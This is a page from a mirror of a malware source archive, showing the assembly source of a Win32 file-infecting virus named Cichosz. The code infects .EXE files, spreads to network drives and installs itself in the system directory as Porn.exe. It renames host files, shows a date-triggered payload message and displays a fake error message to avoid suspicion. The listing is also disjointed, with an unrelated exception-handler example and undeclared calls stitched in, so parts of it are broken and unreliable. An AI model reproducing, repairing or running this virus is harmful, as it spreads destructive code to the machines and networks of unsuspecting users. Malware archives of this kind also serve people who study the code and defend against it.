mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
329 lines
10 KiB
NASM
329 lines
10 KiB
NASM
|
;============================================================
|
||
|
;=== Win32.Cichosz virus. Coded by Necronomikon[ShadowvX] ===
|
||
|
;============================================================
|
||
|
;Virusname: Win32.Cichosz
|
||
|
;Author: Necronomikon
|
||
|
;Date:26-12-00
|
||
|
;Features: - Worming: It checks all drives and if it have access to
|
||
|
;a network drive,it infect there some files. (thanks to SnakeByte)
|
||
|
; - Fuck Debuggers
|
||
|
; - Display MessageBox
|
||
|
; - Renames infected files to svx
|
||
|
;---------------------------------------
|
||
|
;--- based on Win32.3x3 by BumbleBee ---
|
||
|
;---------------------------------------
|
||
|
;======================================================
|
||
|
; . To compile:
|
||
|
;
|
||
|
; tasm32 /ml /m3 cichosz,,;
|
||
|
; tlink32 -Tpe -c cichosz,cichosz,, import32.lib
|
||
|
;=======================================================
|
||
|
.386
|
||
|
locals
|
||
|
jumps
|
||
|
.model flat,STDCALL
|
||
|
|
||
|
extrn ExitProcess:PROC
|
||
|
extrn FindFirstFileA:PROC
|
||
|
extrn FindNextFileA:PROC
|
||
|
extrn FindClose:PROC
|
||
|
extrn GetCommandLineA:PROC
|
||
|
extrn MoveFileA:PROC
|
||
|
extrn CopyFileA:PROC
|
||
|
extrn WinExec:PROC
|
||
|
extrn MessageBoxA:PROC
|
||
|
extrn GetSystemTime:PROC
|
||
|
extrn CloseHandle:PROC
|
||
|
extrn GetFileSize:PROC
|
||
|
extrn GetCurrentDirectoryA:PROC
|
||
|
extrn SetCurrentDirectoryA:PROC
|
||
|
extrn DeleteFileA:PROC
|
||
|
|
||
|
L equ <LARGE>
|
||
|
|
||
|
.DATA
|
||
|
|
||
|
szTitle db "Structured Exception Handler example",0
|
||
|
szMessage db "Intercepted General Protection Fault!",0
|
||
|
|
||
|
.code
|
||
|
|
||
|
start:
|
||
|
call setupSEH ; The call pushes the offset
|
||
|
; past it in the stack rigth?
|
||
|
; So we will use that :)
|
||
|
exceptionhandler:
|
||
|
mov esp,[esp+8] ; Error gives us old ESP
|
||
|
; in [ESP+8]
|
||
|
|
||
|
push 00000000h ; Parameters for MessageBoxA
|
||
|
push offset szTitle
|
||
|
push offset szMessage
|
||
|
push 00000000h
|
||
|
call MessageBoxA
|
||
|
|
||
|
push 00000000h
|
||
|
call ExitProcess ; Exit Application
|
||
|
|
||
|
setupSEH:
|
||
|
push dword ptr fs:[0] ; Push original SEH handler
|
||
|
mov fs:[0],esp ; And put the new one (located
|
||
|
; after the first call)
|
||
|
|
||
|
mov ebx,0BFF70000h ; Try to write in kernel (will
|
||
|
mov eax,012345678h ; generate an exception)
|
||
|
xchg eax,[ebx]
|
||
|
|
||
|
end start
|
||
|
windoze db 'C:\Windows\System\Sys\Porn.exe',0
|
||
|
fHnd dd ? ; handle for files
|
||
|
shit dd 0 ; for write process
|
||
|
cont0 dd 0 ; for loops
|
||
|
cont1 db 0 ; for loops
|
||
|
|
||
|
findData db 316 dup(0) ; data for ffirst and fnext
|
||
|
fMask db '*.EXE' ; mask for finding exe files
|
||
|
ffHnd dd ? ; handle for ffirst and fnext
|
||
|
hostName db 260 dup(0) ; space for save host name
|
||
|
hwoArgs db 260 dup(0) ; host without arguments
|
||
|
futureHostName db 260 dup(0) ; space for save new host name
|
||
|
chDir db 260 dup(0) ; space for save current dir
|
||
|
commandLine dd ? ; handle for command line
|
||
|
sysTimeStruct db 16 dup(0) ; space for system time struct
|
||
|
|
||
|
|
||
|
; virus id and author
|
||
|
virusId db 'Win32.CICHOSZ coded by Necronomikon',0
|
||
|
; message
|
||
|
mess db 'This is my 1st Win32-Virus.'
|
||
|
db 0dh,0ah,'Greetingz tha whole ShadowvX Group!',0
|
||
|
|
||
|
bmess db 'Invalid call in shared memory 0x0cf689000.',0
|
||
|
;--------------------
|
||
|
push offset Buffer ; offset of the buffer
|
||
|
push 60h ; buffer-lenght
|
||
|
call GetLogicalDriveStrings
|
||
|
|
||
|
cmp eax, 0 ; did we fail ?
|
||
|
je StopThis
|
||
|
|
||
|
lea esi, Buffer
|
||
|
|
||
|
WhatDrive:
|
||
|
push esi
|
||
|
call GetDriveType
|
||
|
cmp eax, DRIVE_REMOTE ; we got a network drive
|
||
|
jne NoNetwork
|
||
|
|
||
|
; esi still contains the offset of
|
||
|
; the root dir on the drive
|
||
|
call infectDrive ; so we infect it.. ;P
|
||
|
|
||
|
NoNetwork:
|
||
|
Call GetNextZero ; place esi after the next zero
|
||
|
; ( searching from esi onwards )
|
||
|
cmp byte ptr [esi],0
|
||
|
jne WhatDrive ; if we searched all drives we
|
||
|
; end here, otherwise we check the type
|
||
|
StopThis:
|
||
|
ret
|
||
|
|
||
|
Buffer db 60h dup (?) ; I don't know that many ppl with 20+
|
||
|
; Drives so this buffersize should be
|
||
|
; big enough ;)
|
||
|
;----------------------------------------
|
||
|
virus:
|
||
|
lea eax,sysTimeStruct ; check for payload
|
||
|
push eax
|
||
|
call GetSystemTime ; get system time
|
||
|
|
||
|
lea eax,sysTimeStruct
|
||
|
cmp word ptr [eax+2],12
|
||
|
jne skipPay
|
||
|
cmp word ptr [eax+6],14
|
||
|
jne skipPay
|
||
|
|
||
|
push L 1030h ; show a message box
|
||
|
lea eax,virusId
|
||
|
push eax
|
||
|
lea eax,mess
|
||
|
push eax
|
||
|
push L 0
|
||
|
call MessageBoxA
|
||
|
|
||
|
skipPay:
|
||
|
call GetCommandLineA ; get command line
|
||
|
mov dword ptr [commandLine],eax
|
||
|
|
||
|
xor esi,esi ; copy it to get host path
|
||
|
lea edi,hostName ; needed for infection process
|
||
|
copyLoop:
|
||
|
mov bl,byte ptr [eax+esi]
|
||
|
mov byte ptr [edi+esi],bl
|
||
|
cmp bl,0
|
||
|
je skipArgs
|
||
|
inc esi
|
||
|
jmp copyLoop
|
||
|
|
||
|
skipArgs: ; copy host name without args
|
||
|
xor esi,esi
|
||
|
lea edi,hwoArgs
|
||
|
lea eax,hostName
|
||
|
copyLoopb:
|
||
|
mov bl,byte ptr [eax+esi]
|
||
|
mov byte ptr [edi+esi],bl
|
||
|
cmp bl,'.'
|
||
|
je ffirst
|
||
|
inc esi
|
||
|
jmp copyLoopb
|
||
|
|
||
|
ffirst:
|
||
|
mov dword ptr [edi+esi],'EXE.' ; add extension
|
||
|
; now we have arguments in
|
||
|
; hostName and name only in
|
||
|
; hwoArgs
|
||
|
push 0
|
||
|
lea eax,windoze
|
||
|
push eax
|
||
|
lea eax,hwoArgs
|
||
|
push eax
|
||
|
call CopyFileA ; install in windows dir
|
||
|
|
||
|
lea eax,chDir
|
||
|
push eax ; get current directory
|
||
|
push 260
|
||
|
call GetCurrentDirectoryA
|
||
|
cmp eax,0
|
||
|
|
||
|
retDir:
|
||
|
lea eax,chDir
|
||
|
push eax ; restore work directory
|
||
|
call SetCurrentDirectoryA
|
||
|
|
||
|
|
||
|
fnext:
|
||
|
call infectFile
|
||
|
skipThis:
|
||
|
|
||
|
lea eax,findData
|
||
|
push eax
|
||
|
push dword ptr [ffHnd]
|
||
|
call FindNextFileA ; find next *.EXE
|
||
|
cmp eax,0
|
||
|
jne fnext
|
||
|
|
||
|
push dword ptr [ffHnd]
|
||
|
call FindClose ; close ffist/fnext handle
|
||
|
|
||
|
execHost:
|
||
|
xor esi,esi ; copy hostName to future host Name
|
||
|
lea edi,futureHostName
|
||
|
lea eax,hostName
|
||
|
copyLoop2:
|
||
|
mov bl,byte ptr [eax+esi]
|
||
|
mov byte ptr [edi+esi],bl
|
||
|
cmp bl,'.'
|
||
|
je contExec
|
||
|
inc esi
|
||
|
jmp copyLoop2
|
||
|
|
||
|
contExec:
|
||
|
mov dword ptr [edi+esi],'svx.' ; change ext to svx
|
||
|
|
||
|
push 1
|
||
|
push edi
|
||
|
call WinExec ; exec host
|
||
|
cmp eax,32 ; exec error?
|
||
|
jb lastOptionStealth ; je stealth with lame message
|
||
|
|
||
|
goOut:
|
||
|
push L 0h
|
||
|
call ExitProcess ; exit program
|
||
|
|
||
|
infectFile:
|
||
|
xor esi,esi ; copy file found name to
|
||
|
lea edi,futureHostName ; future host name
|
||
|
lea eax,findData
|
||
|
add eax,44
|
||
|
icopyLoop:
|
||
|
mov bl,byte ptr [eax+esi]
|
||
|
mov byte ptr [edi+esi],bl
|
||
|
cmp bl,'.'
|
||
|
je continueInf
|
||
|
inc esi
|
||
|
jmp icopyLoop
|
||
|
|
||
|
continueInf:
|
||
|
mov dword ptr [edi+esi],'svx.' ; change ext to svx
|
||
|
|
||
|
push eax
|
||
|
push edi
|
||
|
push eax
|
||
|
call MoveFileA ; rename the host to *.svx
|
||
|
|
||
|
pop eax
|
||
|
push 0
|
||
|
push eax
|
||
|
lea eax,hwoArgs
|
||
|
push eax
|
||
|
call CopyFileA ; copy current host to new host
|
||
|
; (virus body)
|
||
|
ret
|
||
|
|
||
|
lastOptionStealth: ; lame mess when we can't exec host
|
||
|
push L 1010h ; user can think the program is
|
||
|
push L 0h ; corrupted or windows goes
|
||
|
lea eax,bmess ; wrong (very common =] )
|
||
|
push eax
|
||
|
push L 0
|
||
|
call MessageBoxA
|
||
|
jmp goOut
|
||
|
|
||
|
dcLoop:
|
||
|
push L 0
|
||
|
lea eax,shit
|
||
|
push eax
|
||
|
push L 1
|
||
|
push edi
|
||
|
push dword ptr [fHnd]
|
||
|
|
||
|
cmp byte ptr [edi],0ffh
|
||
|
jne skipFF
|
||
|
|
||
|
dec dword ptr [cont0]
|
||
|
call addFF
|
||
|
inc edi
|
||
|
|
||
|
skipFF:
|
||
|
inc edi
|
||
|
dec dword ptr [cont0]
|
||
|
cmp dword ptr [cont0],0
|
||
|
jne dcLoop
|
||
|
|
||
|
push dword ptr [fHnd] ; close file
|
||
|
call CloseHandle
|
||
|
|
||
|
addFF:
|
||
|
xor ecx,ecx
|
||
|
mov cl,byte ptr [edi+1]
|
||
|
mov byte ptr [cont1],cl
|
||
|
cmp cl,0
|
||
|
jne addFFLoop
|
||
|
ret
|
||
|
|
||
|
addFFLoop:
|
||
|
push L 0
|
||
|
lea eax,shit
|
||
|
push eax
|
||
|
push L 1
|
||
|
push edi
|
||
|
push dword ptr [fHnd]
|
||
|
dec byte ptr [cont1]
|
||
|
cmp byte ptr [cont1],0
|
||
|
jne addFFLoop
|
||
|
|
||
|
ret
|
||
|
Ends
|
||
|
End virus
|
||
|
|